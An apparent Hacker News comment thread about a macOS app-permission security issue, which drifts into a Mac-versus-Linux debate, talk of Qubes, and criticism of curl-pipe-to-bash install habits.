Something has to give with the Mac ecosystem. The Mac App Store sucks, the Mac has continuously for the past years of been having security issues, serious security issues.

I believe Apple is at a crossroads, something needs to be done with the Mac.


Don't panic.


Maybe Krause can also make an article on the paste board and get some more clicks


I remember in the windows xp days there was an app you could run that would show an alert any time a program tried to hook into your keyboard input or display. I wonder why nothing like that exists any more.


Seems like a nice feature for something like Little Snitch.


Viewing your screen should be subject to permissions simply because it can supersede all permissions to access sensitive data.


This is why I run Qubes. Trusting all software running on my system is unreasonable. Other OS's need to catch up ASAP.


Why wouldn't we assume that?


[flagged]


Golly gee, I can barely hear you all the way up there on your pedestal.

I used linux for a good long while. Started with Ubuntu, then on to Mint, then Arch as I became more of a "power user". But you know what? Sometimes I don't want to put in manual effort to get things to work, even if that means I lose some customization. Over my years with linux, I've had driver issues with displays, with the network manager, with mounting remote drives... Basically any interaction with the hardware was a solid kick in the groin. Since switching to a Macbook, everything has been smooth sailing.

And especially nowadays with homebrew and docker, all the tools I need are available on a Mac, and it's a more integrated experience, and IMHO it looks better. But if you like linux and it works for you, that's also fine by me. To each their own.


Funny that. I use Linux because it just works, macs are a pain and windows is just laughable.

What annoys me about the last decadeish of Mac developers is the terrible prevalence of things like "curl|bash", custom pacakage managers, unversioned software etc.

This could just be the company I work for, but as far as I'm concerned software is not released unless there is a collection of software and instructions on installing. Deb, rpm, even a rat all is fine. Anything that downloads something from a random website is not.

Now obviously Mac developers don't enforce this attitude, but it does seem to correlate.


I used to run Linux before switching to Mac, around 10 years ago. Recently got a Dell XPS 13 and installed Ubuntu (then Mint).

Installing stuff on Ubuntu I used a couple of PPAs. How is this any different than curl|bash? You just trust some repo blindly.

Also, please refer me to this magical distro that just works cause I have seen these before going back to Mac:

- HiDPI scaling does not just work. There are weird issues here and there.

- Closing the lid does not reliably put the laptop to sleep. Sometimes when it does, opening it does not just wake it up.

- Once in a while, the OS completely forgot that it had a Wi-Fi device. I just restarted and it returned.

I don’t have time to test workarounds, read logs, try different distros and shit like that. I never once had to think twice before tossing a MacBook into my pack because it might still be awake?

I love Linux on servers, used o love it on my desktop but that was high school / college days. I had too much time to tweak things just perfect.


I have linux on my macbook. Am I a real developer?

Edit: pls respond.


Using linux has slight advantages only for devops, and even then why would they need it if they can spin up an ec2/run a docker container/use vagrant. Mac OS offers superior UX to linux (unless you invest heaps of engineering hours into setting it up your window manager & env to a usable state). More modern distributions like Mint or Elementary OS might offer somethnig on par, but even then the simplicity and ubiquity of Macs fade their benefits.

The only reason to use Linux is for extra op security, but that's not what programmers main concern usually is.


Linux has superior ui to mac. Hell by default you don't even get virtual desktops on a Mac!

Mint is over a decade old, hardly "modern".

Wasn't the whole point of Mac to "think different"?



Yeah, no.


You are sitting on this OS as an administrator/root and apps can do anything that they want. I dont really see this as an issue. Its always been this way! Go run Qubes OS if you want to protect against this.


> > How can I protect myself as a user? > To my knowledge there is no way to protect yourself as of now.

That is the most FUD bit of this. There's a very easy way for a user to protect themselves: don't download any untrusted applications. Only run code you trust. Don't trust the sandbox that much.

Vulnerabilities like the android MMS one where anyone could send any number an image and pwn it were "as a user you can't protect yourself".

Local roots and things like this require a user to opt-in to being exploited by running a malicious app. That's significantly different and less scary.


How can you know the app you’re using hasn’t been compromised? Publishing a blog post about this specific topic next Thursday




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: